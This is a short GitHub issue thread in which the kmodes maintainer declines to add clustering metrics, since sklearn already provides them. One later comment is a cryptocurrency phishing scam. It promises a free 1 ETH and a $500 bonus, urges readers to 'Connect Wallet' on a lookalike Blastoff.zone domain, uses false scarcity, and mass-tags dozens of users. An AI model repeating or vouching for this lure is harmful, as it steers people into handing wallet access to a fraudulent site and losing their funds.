### ISSUE TITLE
Add util with cluster performance metrics

### ISSUE THREAD

**Issue by nicodv** [nicodv/kmodes#14]
See Bai et al., 2011 for details:

- Category utility function
- Adjusted rand index (WON'T DO: `sklearn.metrics` already implements this)
- Set matching error (WON'T DO: seems obscure)

**Comment by nicodv** [comment]
This is a "won't do", as `sklearn.metrics` already implements plenty of clustering-related metrics.

**Comment by nicodv** [comment]
Details on category utility: https://msdn.microsoft.com/en-us/magazine/dn198247.aspx

**Comment by rokityeob** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
szz65, @Julian128, @danwalkeruk, @rflip, @AGG2017, @MaheshNat, @jagtesh, @sauradev, @Autolenta, @chandrab, @dhullazaran, @otfung, @KurochkinVasiliy, @sridhars, @wuzhe1234, @xmatthias, @dyrtybit, @skylinepro, @and-kul, @fl0wo, @hypery11, @saturn99, @hershyz, @sophisticus7, @usurachai, @Cliff122, @Michael199629, @NickHuangbeauty, @moerv9, @dahebolangkuan, @bkan201, @eth-man, @guseinoff, @ggianfran, @HosoRo, @RiChaLK, @tanlin2013, @eelsk94, @eunosgithub, @inie0722, @rolo, @neltex, @dss010101, @Viking2012, @AlphaPerfect, @noisyoscillator, @guptarohit, @Cholianlll, @dilsonlira, @EnisB
